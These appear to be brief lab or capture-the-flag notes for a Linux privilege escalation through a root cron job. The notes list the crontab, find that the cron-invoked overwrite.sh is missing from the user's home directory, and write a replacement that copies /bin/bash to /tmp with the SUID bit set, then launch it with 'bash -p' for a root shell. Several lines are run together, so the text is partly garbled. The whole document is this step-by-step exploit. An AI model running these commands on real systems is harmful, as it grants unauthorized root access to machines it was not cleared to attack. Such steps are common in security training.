cat /etc/crontabs* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.shls -la the ones happening every minute (overwrite.sh):
ls -la /home/userIt doesn’t exist. Can we create one so we can priv esc with it?
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.shchmod +x /home/user/overwrite.shWait for tmp/bash to be overwritten
ls -la /tmp
once it does:
/tmp/bash -p